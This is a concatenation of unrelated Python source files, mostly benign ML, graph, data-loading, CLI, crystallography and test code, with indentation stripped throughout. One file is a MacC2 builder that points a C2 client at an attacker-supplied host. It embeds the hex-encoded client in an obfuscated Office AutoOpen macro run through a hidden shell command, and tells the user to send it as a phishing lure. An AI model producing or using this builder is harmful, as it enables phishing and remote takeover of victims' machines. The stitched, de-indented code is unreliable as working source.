format_print('Model', ['FP32', 'INT8'])
format_print('throughput_times', throughputs_times)
format_print('latency_times', latencys_times)
#format_print('accuracy_times', accuracys_times)
plt.figure(figsize=(16,6))
draw_bar(x, t, throughputs_times, 131, 'tab:green', 'Throughput Normalized (big is better)', '', width=0.2)
draw_bar(x, t, latencys_times, 132, 'tab:blue', 'Latency Normalized (small is better)', '', width=0.2)
#draw_bar(x, t, accuracys_times, 133, '#28a99d', 'Accuracys Normalized (small is better)', '', width=0.2)
plt.savefig("fp32_int8_times.png")
print("\nSave to fp32_int8_times.png")
|
1619844
|
r"""
Concentration of the eigenvalues
================================
The eigenvalues of the graph Laplacian concentrates to the same value as the
graph becomes full.
"""
import numpy as np
from matplotlib import pyplot as plt
import pygsp as pg
n_neighbors = [1, 2, 5, 8]
fig, axes = plt.subplots(3, len(n_neighbors), figsize=(15, 8))
for k, ax in zip(n_neighbors, axes.T):
graph = pg.graphs.Ring(17, k=k)
graph.compute_fourier_basis()
graph.plot(graph.U[:, 1], ax=ax[0])
ax[0].axis('equal')
ax[1].spy(graph.W)
ax[2].plot(graph.e, '.')
ax[2].set_title('k={}'.format(k))
#graph.set_coordinates('line1D')
#graph.plot(graph.U[:, :4], ax=ax[3], title='')
# Check that the DFT matrix is an eigenbasis of the Laplacian.
U = np.fft.fft(np.identity(graph.n_vertices))
LambdaM = (graph.L.todense().dot(U)) / (U + 1e-15)
# Eigenvalues should be real.
assert np.all(np.abs(np.imag(LambdaM)) < 1e-10)
LambdaM = np.real(LambdaM)
# Check that the eigenvectors are really eigenvectors of the laplacian.
Lambda = np.mean(LambdaM, axis=0)
assert np.all(np.abs(LambdaM - Lambda) < 1e-10)
fig.tight_layout()
|
1619860
|
import scipy.misc
import random
xs = []
ys = []
#points to the end of the last batch
train_batch_pointer = 0
val_batch_pointer = 0
#read data.txt
with open("driving_dataset/data.txt") as f:
for line in f:
xs.append("driving_dataset/" + line.split()[0])
#the paper by Nvidia uses the inverse of the turning radius,
#but steering wheel angle is proportional to the inverse of turning radius
#so the steering wheel angle in radians is used as the output
ys.append(float(line.split()[1]) * scipy.pi / 180)
xs = xs[:10000]
ys = ys[:10000]
#get number of images
num_images = len(xs)
#shuffle list of images
#c = list(zip(xs, ys))
#random.shuffle(c)
#xs, ys = zip(*c)
train_xs = xs[:int(len(xs) * 0.8)]
train_ys = ys[:int(len(xs) * 0.8)]
val_xs = xs[-int(len(xs) * 0.2):]
val_ys = ys[-int(len(xs) * 0.2):]
num_train_images = len(train_xs)
num_val_images = len(val_xs)
def LoadTrainBatch(batch_size):
global train_batch_pointer
x_out = []
y_out = []
for i in range(0, batch_size):
x_out.append(scipy.misc.imresize(scipy.misc.imread(train_xs[(train_batch_pointer + i) % num_train_images])[-150:], [66, 200]) / 255.0)
y_out.append([train_ys[(train_batch_pointer + i) % num_train_images]])
train_batch_pointer += batch_size
return x_out, y_out
def LoadValBatch(batch_size):
global val_batch_pointer
x_out = []
y_out = []
for i in range(0, batch_size):
x_out.append(scipy.misc.imresize(scipy.misc.imread(val_xs[(val_batch_pointer + i) % num_val_images])[-150:], [66, 200]) / 255.0)
y_out.append([val_ys[(val_batch_pointer + i) % num_val_images]])
val_batch_pointer += batch_size
return x_out, y_out
|
1619880
|
from __future__ import print_function
import operator
from arcapix.fs.gpfs import ManagementPolicy, MapReduceRule
# create a policy object
p = ManagementPolicy()
# define a map function
def mapfn(f):
# returns a set of any file xattr names
try:
return set(f.xattrs.split())
except AttributeError:
return set()
# create a MapReduce rule
# reduce function combines individual sets to return unique xattr names
r = p.rules.new(MapReduceRule, 'xattrset', mapfn, operator.ior)
# change 'show' to list the file xattr names
# (these aren't returned by the policy engine by default)
r.change(show="('xattrs=' || GetXattrs('*', 'key'))")
# run the policy
print(p.run('mmfs1')['xattrset'])
# prints a set of unique file xattr names, e.g.
# {'gpfs.CLONE', 'user.foo', 'user.owner'}
|
1619882
|
from pathlib import Path
import typer
APP_NAME = "my-super-cli-app"
def main():
app_dir = typer.get_app_dir(APP_NAME)
app_dir_path = Path(app_dir)
app_dir_path.mkdir(parents=True, exist_ok=True)
config_path: Path = Path(app_dir) / "config.json"
if not config_path.is_file():
config_path.write_text('{"version": "1.0.0"}')
config_file_str = str(config_path)
typer.echo("Opening config directory")
typer.launch(config_file_str, locate=True)
if __name__ == "__main__":
typer.run(main)
|
1619891
|
import attr
import typing
from kgtk.kgtkformat import KgtkFormat
@attr.s(slots=True, frozen=False)
class KgtkMergeColumns:
"""Merge columns from multiple KgtkReaders, respecting predefined column
names with aliases.
"""
# For attrs 19.1.0 and later:
column_names: typing.List[str] = attr.ib(validator=attr.validators.deep_iterable(member_validator=attr.validators.instance_of(str),
iterable_validator=attr.validators.instance_of(list)),
factory=list)
# Keep a record of the reserved columns with aliases as we encounter them.
# We will retain the first alias encountered of each group.
id_column_idx: int = attr.ib(validator=attr.validators.instance_of(int), default=-1)
node1_column_idx: int = attr.ib(validator=attr.validators.instance_of(int), default=-1)
label_column_idx: int = attr.ib(validator=attr.validators.instance_of(int), default=-1)
node2_column_idx: int = attr.ib(validator=attr.validators.instance_of(int), default=-1)
# The column name map is a debugging convenience. It is not required for
# the merge algorithm.
column_name_map: typing.MutableMapping[str, int] = attr.ib(validator=attr.validators.deep_mapping(key_validator=attr.validators.instance_of(str),
value_validator=attr.validators.instance_of(int)),
factory=dict)
# Maintain a list of the old and new column name lists as a convenience
# for debugging and feedback.
old_column_name_lists: typing.List[typing.List[str]] = attr.ib(factory=list)
new_column_name_lists: typing.List[typing.List[str]] = attr.ib(factory=list)
def merge(self, column_names: typing.List[str], prefix: typing.Optional[str]=None):
"""Add column names into the merged column name list, respecting predefined
column names with aliases.
Return a list of new column names with predefined name aliases replaced with
the name first used in each alias group in the joint list of column names.
"""
new_column_names: typing.List[str] = [ ]
# Record the old column names for debugging.
self.old_column_name_lists.append(column_names.copy())
column_name: str
idx: int = 0
for idx, column_name in enumerate(column_names):
if column_name in KgtkFormat.ID_COLUMN_NAMES:
if self.id_column_idx >= 0:
column_name = self.column_names[self.id_column_idx]
else:
self.id_column_idx = len(self.column_names)
elif column_name in KgtkFormat.NODE1_COLUMN_NAMES:
if self.node1_column_idx >= 0:
column_name = self.column_names[self.node1_column_idx]
else:
self.node1_column_idx = len(self.column_names)
elif column_name in KgtkFormat.LABEL_COLUMN_NAMES:
if self.label_column_idx >= 0:
column_name = self.column_names[self.label_column_idx]
else:
self.label_column_idx = len(self.column_names)
elif column_name in KgtkFormat.NODE2_COLUMN_NAMES:
if self.node2_column_idx >= 0:
column_name = self.column_names[self.node2_column_idx]
else:
self.node2_column_idx = len(self.column_names)
else:
# Apply the optional prefix.
if prefix is not None and len(prefix) > 0:
column_name = prefix + column_name
new_column_names.append(column_name)
if column_name not in self.column_name_map:
self.column_name_map[column_name] = len(self.column_names)
self.column_names.append(column_name)
self.new_column_name_lists.append(new_column_names)
return new_column_names
|
1619905
|
import glob
import os
import sys
import time
import cv2
import numpy as np
import png
from ip_basic import depth_map_utils
from ip_basic import vis_utils
def main():
"""Depth maps are saved to the 'outputs' folder.
"""
##############################
# Options
##############################
# Validation set
input_depth_dir = os.path.expanduser(
'~/Kitti/depth/depth_selection/val_selection_cropped/velodyne_raw')
data_split = 'val'
# Test set
# input_depth_dir = os.path.expanduser(
# '~/Kitti/depth/depth_selection/test_depth_completion_anonymous/velodyne_raw')
# data_split = 'test'
# Fast fill with Gaussian blur @90Hz (paper result)
fill_type = 'fast'
extrapolate = True
blur_type = 'gaussian'
# Fast Fill with bilateral blur, no extrapolation @87Hz (recommended)
# fill_type = 'fast'
# extrapolate = False
# blur_type = 'bilateral'
# Multi-scale dilations with extra noise removal, no extrapolation @ 30Hz
# fill_type = 'multiscale'
# extrapolate = False
# blur_type = 'bilateral'
# Save output to disk or show process
save_output = True
##############################
# Processing
##############################
if save_output:
# Save to Disk
show_process = False
save_depth_maps = True
else:
if fill_type == 'fast':
raise ValueError('"fast" fill does not support show_process')
# Show Process
show_process = True
save_depth_maps = False
# Create output folder
this_file_path = os.path.dirname(os.path.realpath(__file__))
outputs_dir = this_file_path + '/outputs'
os.makedirs(outputs_dir, exist_ok=True)
output_folder_prefix = 'depth_' + data_split
output_list = sorted(os.listdir(outputs_dir))
if len(output_list) > 0:
split_folders = [folder for folder in output_list
if folder.startswith(output_folder_prefix)]
if len(split_folders) > 0:
last_output_folder = split_folders[-1]
last_output_index = int(last_output_folder.split('_')[-1])
else:
last_output_index = -1
else:
last_output_index = -1
output_depth_dir = outputs_dir + '/{}_{:03d}'.format(
output_folder_prefix, last_output_index + 1)
if save_output:
if not os.path.exists(output_depth_dir):
os.makedirs(output_depth_dir)
else:
raise FileExistsError('Already exists!')
print('Output dir:', output_depth_dir)
# Get images in sorted order
images_to_use = sorted(glob.glob(input_depth_dir + '/*'))
# Rolling average array of times for time estimation
avg_time_arr_length = 10
last_fill_times = np.repeat([1.0], avg_time_arr_length)
last_total_times = np.repeat([1.0], avg_time_arr_length)
num_images = len(images_to_use)
for i in range(num_images):
depth_image_path = images_to_use[i]
# Calculate average time with last n fill times
avg_fill_time = np.mean(last_fill_times)
avg_total_time = np.mean(last_total_times)
# Show progress
sys.stdout.write('\rProcessing {} / {}, '
'Avg Fill Time: {:.5f}s, '
'Avg Total Time: {:.5f}s, '
'Est Time Remaining: {:.3f}s'.format(
i, num_images - 1, avg_fill_time, avg_total_time,
avg_total_time * (num_images - i)))
sys.stdout.flush()
# Start timing
start_total_time = time.time()
# Load depth projections from uint16 image
depth_image = cv2.imread(depth_image_path, cv2.IMREAD_ANYDEPTH)
projected_depths = np.float32(depth_image / 256.0)
# Fill in
start_fill_time = time.time()
if fill_type == 'fast':
final_depths = depth_map_utils.fill_in_fast(
projected_depths, extrapolate=extrapolate, blur_type=blur_type)
elif fill_type == 'multiscale':
final_depths, process_dict = depth_map_utils.fill_in_multiscale(
projected_depths, extrapolate=extrapolate, blur_type=blur_type,
show_process=show_process)
else:
raise ValueError('Invalid fill_type {}'.format(fill_type))
end_fill_time = time.time()
# Display images from process_dict
if fill_type == 'multiscale' and show_process:
img_size = (570, 165)
x_start = 80
y_start = 50
x_offset = img_size[0]
y_offset = img_size[1]
x_padding = 0
y_padding = 28
img_x = x_start
img_y = y_start
max_x = 1900
row_idx = 0
for key, value in process_dict.items():
image_jet = cv2.applyColorMap(
np.uint8(value / np.amax(value) * 255),
cv2.COLORMAP_JET)
vis_utils.cv2_show_image(
key, image_jet,
img_size, (img_x, img_y))
img_x += x_offset + x_padding
if (img_x + x_offset + x_padding) > max_x:
img_x = x_start
row_idx += 1
img_y = y_start + row_idx * (y_offset + y_padding)
# Save process images
cv2.imwrite('process/' + key + '.png', image_jet)
cv2.waitKey()
# Save depth images to disk
if save_depth_maps:
depth_image_file_name = os.path.split(depth_image_path)[1]
# Save depth map to a uint16 png (same format as disparity maps)
file_path = output_depth_dir + '/' + depth_image_file_name
with open(file_path, 'wb') as f:
depth_image = (final_depths * 256).astype(np.uint16)
# pypng is used because cv2 cannot save uint16 format images
writer = png.Writer(width=depth_image.shape[1],
height=depth_image.shape[0],
bitdepth=16,
greyscale=True)
writer.write(f, depth_image)
end_total_time = time.time()
# Update fill times
last_fill_times = np.roll(last_fill_times, -1)
last_fill_times[-1] = end_fill_time - start_fill_time
# Update total times
last_total_times = np.roll(last_total_times, -1)
last_total_times[-1] = end_total_time - start_total_time
if __name__ == "__main__":
main()
|
1619913
|
import optparse
from optparse import OptionParser
import sys
import base64
import binascii
import os
import random
from random import randrange
if ((len(sys.argv) < 5 or len(sys.argv) > 5) and '-h' not in sys.argv):
print("Usage: %s -s <C2 Server IP/domain> -p <C2 Server Port>" % sys.argv[0])
sys.exit(1)
parser = OptionParser()
parser.add_option("-s", "--server", help="C2 server IP address")
parser.add_option("-p", "--port", help="C2 server port")
(options, args) = parser.parse_args()
host = options.server
port = options.port
f1 = open('server.py','r')
f2 = open('MacC2_server.py','w')
for line in f1:
f2.write(line.replace('127.0.0.1', host).replace('port=443', 'port=%s'%port))
f1.close()
f2.close()
f3 = open('client.py','r')
f4 = open('MacC2_client.py', 'w')
for line in f3:
f4.write(line.replace('127.0.0.1', (host+":%s"%port)))
f3.close()
f4.close()
with open('MacC2_client.py', 'r') as file:
data = file.read()
data2 = binascii.hexlify(data.encode('utf-8'))
macrofile = open('macro.txt', 'w')
macrofile.write('Sub AutoOpen()\n')
macrofile.write("a = \"p\" + \"yt\" + \"h\" + \"on\"\n")
macrofile.write("b = \"ex\" + \"e\" + \"c\"\n")
macrofile.write("")
initializer = 0
totallength = len(data2)
chars = 'abcdef'
varname = ''.join(random.choices(chars, k=8))
rowcount = randrange(40,60)
while totallength > 0:
if initializer == 0:
int1 = rowcount*initializer
int2 = rowcount + int1
text2 = data2[int1:int2].decode('utf8')
macrofile.write("%s = \"%s\"\n" % (varname,text2))
totallength = totallength - rowcount
initializer = initializer + 1
else:
int3 = rowcount*initializer
int4 = rowcount + int3
text3 = data2[int3:int4].decode('utf8')
macrofile.write("%s = %s + \"%s\"\n" % (varname,varname,text3))
totallength = totallength - rowcount
initializer = initializer + 1
macro = "MacScript (\"do shell script \"\"\" & a & \" -c \\\"\"import sys,socket,binascii,commands,os,ssl;\" & b & \"(binascii.unhexlify({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('\" & %s & \"')))\\\"\" &> /dev/null \"\"\")\n" % varname
macrofile.write(macro)
macrofile.write("End Sub\n")
macrofile.close()
os.system("cp client-orig.py client.py")
print("-"*100)
print("==>Start MacC2_server.py and then upload MacC2_client.py (or whatever you want to rename it) to your target macOS device and execute.")
print("==>Or you can use the macro generated by this script as a phishing lure (macro-enabled MS Office doc):")
print("Paste the macro code from macro.txt into your macro-enabled Office doc as a macro and send!")
print("[-] Note: When access is gained through the macro-enabled Word doc, some MacC2 functions may not work due to sandboxing.")
print("Happy hunting!")
print('')
print("Macro was written to macro.txt in the current working directory")
print("DONE!")
|
1619932
|
import re
from dataclasses import dataclass
regex = r"978[-0-9]{10,15}"
pattern = re.compile(regex)
@dataclass(init=False, eq=True, frozen=True)
class Isbn:
"""Isbn represents an ISBN code as a value object"""
value: str
def __init__(self, value: str):
if pattern.match(value) is None:
raise ValueError("isbn should be a valid format.")
object.__setattr__(self, "value", value)
|
1619937
|
from autodesk.scheduler import Scheduler
from autodesk.states import UP, DOWN
from pandas import Timedelta
def test_active_for_30minutes_with_60minute_limit_and_desk_down():
active_time = Timedelta(minutes=30)
limits = (Timedelta(minutes=60), Timedelta(minutes=30))
scheduler = Scheduler(limits)
delay = scheduler.compute_delay(active_time, DOWN)
assert delay == Timedelta(minutes=30)
def test_active_for_30minutes_with_30minute_limit_and_desk_up():
active_time = Timedelta(minutes=30)
limits = (Timedelta(minutes=60), Timedelta(minutes=30))
scheduler = Scheduler(limits)
delay = scheduler.compute_delay(active_time, UP)
assert delay == Timedelta(0)
|
1619939
|
from __future__ import absolute_import, division, print_function
from scitbx.math import tensor_rank_2_gradient_transform_matrix
from scitbx import matrix
from scitbx.array_family import flex
import cmath
import math
from six.moves import zip
mtps = -2 * math.pi**2
class structure_factor:
def __init__(self, xray_structure, hkl):
self.unit_cell = xray_structure.unit_cell()
self.space_group = xray_structure.space_group()
self.scatterers = xray_structure.scatterers()
self.site_symmetry_table = xray_structure.site_symmetry_table()
self.scattering_type_registry = xray_structure.scattering_type_registry()
self.hkl = hkl
self.d_star_sq = self.unit_cell.d_star_sq(hkl)
def f(self):
result = 0
tphkl = 2 * math.pi * matrix.col(self.hkl)
for scatterer in self.scatterers:
w = scatterer.weight()
if (not scatterer.flags.use_u_aniso()):
huh = scatterer.u_iso * self.d_star_sq
dw = math.exp(mtps * huh)
gaussian = self.scattering_type_registry.gaussian_not_optional(
scattering_type=scatterer.scattering_type)
f0 = gaussian.at_d_star_sq(self.d_star_sq)
ffp = f0 + scatterer.fp
fdp = scatterer.fdp
ff = ffp + 1j * fdp
for s in self.space_group:
s_site = s * scatterer.site
alpha = matrix.col(s_site).dot(tphkl)
if (scatterer.flags.use_u_aniso()):
r = s.r().as_rational().as_float()
s_u_star_s = r*matrix.sym(sym_mat3=scatterer.u_star)*r.transpose()
huh = (matrix.row(self.hkl) * s_u_star_s).dot(matrix.col(self.hkl))
dw = math.exp(mtps * huh)
e = cmath.exp(1j*alpha)
result += w * dw * ff * e
return result
def df_d_params(self):
tphkl = 2 * math.pi * matrix.col(self.hkl)
h,k,l = self.hkl
d_exp_huh_d_u_star = matrix.col([h**2, k**2, l**2, 2*h*k, 2*h*l, 2*k*l])
for i_scatterer,scatterer in enumerate(self.scatterers):
site_symmetry_ops = None
if (self.site_symmetry_table.is_special_position(i_scatterer)):
site_symmetry_ops = self.site_symmetry_table.get(i_scatterer)
site_constraints = site_symmetry_ops.site_constraints()
if (scatterer.flags.use_u_aniso()):
adp_constraints = site_symmetry_ops.adp_constraints()
w = scatterer.weight()
wwo = scatterer.weight_without_occupancy()
if (not scatterer.flags.use_u_aniso()):
huh = scatterer.u_iso * self.d_star_sq
dw = math.exp(mtps * huh)
gaussian = self.scattering_type_registry.gaussian_not_optional(
scattering_type=scatterer.scattering_type)
f0 = gaussian.at_d_star_sq(self.d_star_sq)
ffp = f0 + scatterer.fp
fdp = scatterer.fdp
ff = ffp + 1j * fdp
d_site = matrix.col([0,0,0])
if (not scatterer.flags.use_u_aniso()):
d_u_iso = 0
d_u_star = None
else:
d_u_iso = None
d_u_star = matrix.col([0,0,0,0,0,0])
d_occ = 0j
d_fp = 0j
d_fdp = 0j
for s in self.space_group:
r = s.r().as_rational().as_float()
s_site = s * scatterer.site
alpha = matrix.col(s_site).dot(tphkl)
if (scatterer.flags.use_u_aniso()):
s_u_star_s = r*matrix.sym(sym_mat3=scatterer.u_star)*r.transpose()
huh = (matrix.row(self.hkl) * s_u_star_s).dot(matrix.col(self.hkl))
dw = math.exp(mtps * huh)
e = cmath.exp(1j*alpha)
site_gtmx = r.transpose()
d_site += site_gtmx * (
w * dw * ff * e * 1j * tphkl)
if (not scatterer.flags.use_u_aniso()):
d_u_iso += w * dw * ff * e * mtps * self.d_star_sq
else:
u_star_gtmx = matrix.sqr(tensor_rank_2_gradient_transform_matrix(r))
d_u_star += u_star_gtmx * (
w * dw * ff * e * mtps * d_exp_huh_d_u_star)
d_occ += wwo * dw * ff * e
d_fp += w * dw * e
d_fdp += w * dw * e * 1j
if (site_symmetry_ops is not None):
gsm = site_constraints.gradient_sum_matrix()
gsm = matrix.rec(elems=gsm, n=gsm.focus())
d_site = gsm * d_site
if (scatterer.flags.use_u_aniso()):
gsm = adp_constraints.gradient_sum_matrix()
gsm = matrix.rec(elems=gsm, n=gsm.focus())
d_u_star = gsm * d_u_star
result = flex.complex_double(d_site)
if (not scatterer.flags.use_u_aniso()):
result.append(d_u_iso)
else:
result.extend(flex.complex_double(d_u_star))
result.extend(flex.complex_double([d_occ, d_fp, d_fdp]))
yield result
def d2f_d_params(self):
tphkl = 2 * math.pi * flex.double(self.hkl)
tphkl_outer = tphkl.matrix_outer_product(tphkl) \
.matrix_symmetric_as_packed_u()
h,k,l = self.hkl
d_exp_huh_d_u_star = flex.double([h**2, k**2, l**2, 2*h*k, 2*h*l, 2*k*l])
d2_exp_huh_d_u_star_u_star = d_exp_huh_d_u_star.matrix_outer_product(
d_exp_huh_d_u_star).matrix_symmetric_as_packed_u()
for i_scatterer,scatterer in enumerate(self.scatterers):
site_symmetry_ops = None
if (self.site_symmetry_table.is_special_position(i_scatterer)):
site_symmetry_ops = self.site_symmetry_table.get(i_scatterer)
site_constraints = site_symmetry_ops.site_constraints()
if (scatterer.flags.use_u_aniso()):
adp_constraints = site_symmetry_ops.adp_constraints()
w = scatterer.weight()
wwo = scatterer.weight_without_occupancy()
if (not scatterer.flags.use_u_aniso()):
huh = scatterer.u_iso * self.d_star_sq
dw = math.exp(mtps * huh)
gaussian = self.scattering_type_registry.gaussian_not_optional(
scattering_type=scatterer.scattering_type)
f0 = gaussian.at_d_star_sq(self.d_star_sq)
ffp = f0 + scatterer.fp
fdp = scatterer.fdp
ff = (ffp + 1j * fdp)
d2_site_site = flex.complex_double(3*(3+1)//2, 0j)
if (not scatterer.flags.use_u_aniso()):
d2_site_u_iso = flex.complex_double(flex.grid(3,1), 0j)
d2_site_u_star = None
else:
d2_site_u_iso = None
d2_site_u_star = flex.complex_double(flex.grid(3,6), 0j)
d2_site_occ = flex.complex_double(flex.grid(3,1), 0j)
d2_site_fp = flex.complex_double(flex.grid(3,1), 0j)
d2_site_fdp = flex.complex_double(flex.grid(3,1), 0j)
if (not scatterer.flags.use_u_aniso()):
d2_u_iso_u_iso = 0j
d2_u_iso_occ = 0j
d2_u_iso_fp = 0j
d2_u_iso_fdp = 0j
else:
d2_u_star_u_star = flex.complex_double(6*(6+1)//2, 0j)
d2_u_star_occ = flex.complex_double(flex.grid(6,1), 0j)
d2_u_star_fp = flex.complex_double(flex.grid(6,1), 0j)
d2_u_star_fdp = flex.complex_double(flex.grid(6,1), 0j)
d2_occ_fp = 0j
d2_occ_fdp = 0j
for s in self.space_group:
r = s.r().as_rational().as_float()
s_site = s * scatterer.site
alpha = tphkl.dot(flex.double(s_site))
if (scatterer.flags.use_u_aniso()):
s_u_star_s = r*matrix.sym(sym_mat3=scatterer.u_star)*r.transpose()
huh = (matrix.row(self.hkl) * s_u_star_s).dot(matrix.col(self.hkl))
dw = math.exp(mtps * huh)
e = cmath.exp(1j*alpha)
site_gtmx = flex.double(r.transpose())
site_gtmx.reshape(flex.grid(3,3))
d2_site_site += (w * dw * ff * e * (-1)) * (
site_gtmx.matrix_multiply_packed_u_multiply_lhs_transpose(
tphkl_outer))
if (not scatterer.flags.use_u_aniso()):
d2_site_u_iso += (w * dw * ff * e * 1j * mtps * self.d_star_sq) \
* site_gtmx.matrix_multiply(tphkl)
else:
u_star_gtmx = tensor_rank_2_gradient_transform_matrix(r)
d2_site_u_star += (w * dw * ff * e * 1j * mtps) \
* site_gtmx.matrix_multiply(
tphkl.matrix_outer_product(d_exp_huh_d_u_star)) \
.matrix_multiply(u_star_gtmx.matrix_transpose())
site_gtmx_tphkl = site_gtmx.matrix_multiply(tphkl)
d2_site_occ += (wwo * dw * ff * e * 1j) * site_gtmx_tphkl
d2_site_fp += (w * dw * e * 1j) * site_gtmx_tphkl
d2_site_fdp += (w * dw * e * (-1)) * site_gtmx_tphkl
if (not scatterer.flags.use_u_aniso()):
d2_u_iso_u_iso += w * dw * ff * e * (mtps * self.d_star_sq)**2
d2_u_iso_occ += wwo * dw * ff * e * mtps * self.d_star_sq
d2_u_iso_fp += w * dw * e * mtps * self.d_star_sq
d2_u_iso_fdp += 1j * w * dw * e * mtps * self.d_star_sq
else:
d2_u_star_u_star +=(w * dw * ff * e * mtps**2) \
* u_star_gtmx.matrix_multiply_packed_u_multiply_lhs_transpose(
d2_exp_huh_d_u_star_u_star)
u_star_gtmx_d_exp_huh_d_u_star = u_star_gtmx.matrix_multiply(
d_exp_huh_d_u_star)
d2_u_star_occ += (wwo * dw * ff * e * mtps) \
* u_star_gtmx_d_exp_huh_d_u_star
d2_u_star_fp += (w * dw * e * mtps) \
* u_star_gtmx_d_exp_huh_d_u_star
d2_u_star_fdp += (w * dw * 1j * e * mtps) \
* u_star_gtmx_d_exp_huh_d_u_star
d2_occ_fp += wwo * dw * e
d2_occ_fdp += wwo * dw * e * 1j
if (site_symmetry_ops is None):
i_u = 3
else:
i_u = site_constraints.n_independent_params()
if (not scatterer.flags.use_u_aniso()):
i_occ = i_u + 1
elif (site_symmetry_ops is None):
i_occ = i_u + 6
else:
i_occ = i_u + adp_constraints.n_independent_params()
i_fp, i_fdp, np = i_occ+1, i_occ+2, i_occ+3
if (site_symmetry_ops is not None):
gsm = site_constraints.gradient_sum_matrix()
d2_site_site = gsm.matrix_multiply_packed_u_multiply_lhs_transpose(
packed_u=d2_site_site)
if (not scatterer.flags.use_u_aniso()):
d2_site_u_iso = gsm.matrix_multiply(d2_site_u_iso)
else:
d2_site_u_star = gsm.matrix_multiply(d2_site_u_star)
d2_site_occ = gsm.matrix_multiply(d2_site_occ)
d2_site_fp = gsm.matrix_multiply(d2_site_fp)
d2_site_fdp = gsm.matrix_multiply(d2_site_fdp)
if (scatterer.flags.use_u_aniso()):
gsm = adp_constraints.gradient_sum_matrix()
d2_site_u_star = d2_site_u_star.matrix_multiply(
gsm.matrix_transpose())
d2_u_star_u_star = gsm \
.matrix_multiply_packed_u_multiply_lhs_transpose(
packed_u=d2_u_star_u_star)
d2_u_star_occ = gsm.matrix_multiply(d2_u_star_occ)
d2_u_star_fp = gsm.matrix_multiply(d2_u_star_fp)
d2_u_star_fdp = gsm.matrix_multiply(d2_u_star_fdp)
dp = flex.complex_double(flex.grid(np,np), 0j)
paste = dp.matrix_paste_block_in_place
paste(d2_site_site.matrix_packed_u_as_symmetric(), 0,0)
if (not scatterer.flags.use_u_aniso()):
paste(d2_site_u_iso, 0,i_u)
paste(d2_site_u_iso.matrix_transpose(), i_u,0)
else:
paste(d2_site_u_star, 0,i_u)
paste(d2_site_u_star.matrix_transpose(), i_u,0)
paste(d2_site_occ, 0,i_occ)
paste(d2_site_occ.matrix_transpose(), i_occ,0)
paste(d2_site_fp, 0,i_fp)
paste(d2_site_fp.matrix_transpose(), i_fp,0)
paste(d2_site_fdp, 0,i_fdp)
paste(d2_site_fdp.matrix_transpose(), i_fdp,0)
if (not scatterer.flags.use_u_aniso()):
dp[i_u*np+i_u] = d2_u_iso_u_iso
dp[i_u*np+i_occ] = d2_u_iso_occ
dp[i_occ*np+i_u] = d2_u_iso_occ
dp[i_u*np+i_fp] = d2_u_iso_fp
dp[i_fp*np+i_u] = d2_u_iso_fp
dp[i_u*np+i_fdp] = d2_u_iso_fdp
dp[i_fdp*np+i_u] = d2_u_iso_fdp
else:
paste(d2_u_star_u_star.matrix_packed_u_as_symmetric(), i_u, i_u)
paste(d2_u_star_occ, i_u, i_occ)
paste(d2_u_star_occ.matrix_transpose(), i_occ, i_u)
paste(d2_u_star_fp, i_u, i_fp)
paste(d2_u_star_fp.matrix_transpose(), i_fp, i_u)
paste(d2_u_star_fdp, i_u, i_fdp)
paste(d2_u_star_fdp.matrix_transpose(), i_fdp, i_u)
dp[i_occ*np+i_fp] = d2_occ_fp
dp[i_fp*np+i_occ] = d2_occ_fp
dp[i_occ*np+i_fdp] = d2_occ_fdp
dp[i_fdp*np+i_occ] = d2_occ_fdp
yield dp
def d2f_d_params_diag(self):
tphkl = 2 * math.pi * flex.double(self.hkl)
tphkl_outer = tphkl.matrix_outer_product(tphkl) \
.matrix_symmetric_as_packed_u()
h,k,l = self.hkl
d_exp_huh_d_u_star = flex.double([h**2, k**2, l**2, 2*h*k, 2*h*l, 2*k*l])
d2_exp_huh_d_u_star_u_star = d_exp_huh_d_u_star.matrix_outer_product(
d_exp_huh_d_u_star).matrix_symmetric_as_packed_u()
for i_scatterer,scatterer in enumerate(self.scatterers):
site_symmetry_ops = None
if (self.site_symmetry_table.is_special_position(i_scatterer)):
site_symmetry_ops = self.site_symmetry_table.get(i_scatterer)
site_constraints = site_symmetry_ops.site_constraints()
if (scatterer.flags.use_u_aniso()):
adp_constraints = site_symmetry_ops.adp_constraints()
w = scatterer.weight()
if (not scatterer.flags.use_u_aniso()):
huh = scatterer.u_iso * self.d_star_sq
dw = math.exp(mtps * huh)
gaussian = self.scattering_type_registry.gaussian_not_optional(
scattering_type=scatterer.scattering_type)
f0 = gaussian.at_d_star_sq(self.d_star_sq)
ffp = f0 + scatterer.fp
fdp = scatterer.fdp
ff = (ffp + 1j * fdp)
d2_site_site = flex.complex_double(3*(3+1)//2, 0j)
if (not scatterer.flags.use_u_aniso()):
d2_u_iso_u_iso = 0j
else:
d2_u_star_u_star = flex.complex_double(6*(6+1)//2, 0j)
for s in self.space_group:
r = s.r().as_rational().as_float()
s_site = s * scatterer.site
alpha = tphkl.dot(flex.double(s_site))
if (scatterer.flags.use_u_aniso()):
s_u_star_s = r*matrix.sym(sym_mat3=scatterer.u_star)*r.transpose()
huh = (matrix.row(self.hkl) * s_u_star_s).dot(matrix.col(self.hkl))
dw = math.exp(mtps * huh)
e = cmath.exp(1j*alpha)
site_gtmx = flex.double(r.transpose())
site_gtmx.reshape(flex.grid(3,3))
d2_site_site += (w * dw * ff * e * (-1)) * (
site_gtmx.matrix_multiply_packed_u_multiply_lhs_transpose(
tphkl_outer))
if (not scatterer.flags.use_u_aniso()):
d2_u_iso_u_iso += w * dw * ff * e * (mtps * self.d_star_sq)**2
else:
u_star_gtmx = tensor_rank_2_gradient_transform_matrix(r)
d2_u_star_u_star +=(w * dw * ff * e * mtps**2) \
* u_star_gtmx.matrix_multiply_packed_u_multiply_lhs_transpose(
d2_exp_huh_d_u_star_u_star)
if (site_symmetry_ops is None):
i_u = 3
else:
i_u = site_constraints.n_independent_params()
if (not scatterer.flags.use_u_aniso()):
i_occ = i_u + 1
elif (site_symmetry_ops is None):
i_occ = i_u + 6
else:
i_occ = i_u + adp_constraints.n_independent_params()
np = i_occ+3
if (site_symmetry_ops is not None):
gsm = site_constraints.gradient_sum_matrix()
d2_site_site = gsm.matrix_multiply_packed_u_multiply_lhs_transpose(
packed_u=d2_site_site)
if (scatterer.flags.use_u_aniso()):
gsm = adp_constraints.gradient_sum_matrix()
d2_u_star_u_star = gsm \
.matrix_multiply_packed_u_multiply_lhs_transpose(
packed_u=d2_u_star_u_star)
#
dpd = flex.complex_double(flex.grid(np,1), 0j)
def paste(d, i):
d.reshape(flex.grid(d.size(),1))
dpd.matrix_paste_block_in_place(d, i,0)
paste(d2_site_site.matrix_packed_u_diagonal(), 0)
